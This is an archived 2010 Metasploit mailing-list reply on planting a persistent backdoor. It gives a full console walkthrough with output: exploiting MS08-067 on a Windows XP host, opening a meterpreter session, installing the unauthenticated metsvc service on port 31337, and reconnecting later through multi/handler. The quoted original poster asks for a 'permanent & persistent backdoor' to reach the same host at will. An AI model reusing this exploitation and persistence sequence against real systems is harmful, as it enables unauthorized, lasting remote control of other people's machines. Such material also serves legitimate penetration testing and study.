Metasploit mailing list archives
Re: newbie backdoor issue
From: troy () defendit com au
Date: Fri, 22 Jan 2010 18:09:24 +1100 (EST)
Hi, You could upload meterpreter and install as a service. Eaxample: msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.9 RHOST => 192.168.0.9 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.3:36842 -> 192.168.0.9:4444) meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\WINDOWS\TEMP\iTImctYkkgUlqQ... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter> To conenct back to host later: Background session 2? [y/N] y msf exploit(ms08_067_netapi) > back msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.0.9 RHOST => 192.168.0.9 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*] Meterpreter session 3 opened (192.168.0.3:49164 -> 192.168.0.9:31337) meterpreter > Background session 3? [y/N] msf exploit(handler) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 2 Meterpreter 192.168.0.3:41472 -> 192.168.0.9:4444 3 Meterpreter 192.168.0.3:49164 -> 192.168.0.9:31337 Caution, the meterpreter listener doesn't require authentication, anybody who can access the meterpreter port (in this cse 31337) could connect to the target and gain system privs.
sorry if it seems odd in first look but.. tested on on target environment xp sp2 obtained shell..lol but issue is how to set a permanent & presistance backdoor so that I can connect same host when I wish to.. any suggestion or help appreciated -- Happiness is like a Butterfly... The INTERNET now has a personality. YOURS! See your Yahoo! Homepage. http://in.yahoo.com/_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- newbie backdoor issue SuNeEl (Jan 21)
- Re: newbie backdoor issue troy (Jan 21)
- Re: newbie backdoor issue SuNeEl (Jan 22)
- Re: newbie backdoor issue troy (Jan 22)
- Re: newbie backdoor issue Carlos Perez (Jan 22)
- Re: newbie backdoor issue SuNeEl (Jan 22)
- Re: newbie backdoor issue SuNeEl (Jan 22)
- Re: newbie backdoor issue HD Moore (Jan 22)
- Re: newbie backdoor issue SuNeEl (Jan 23)
- Re: newbie backdoor issue troy (Jan 21)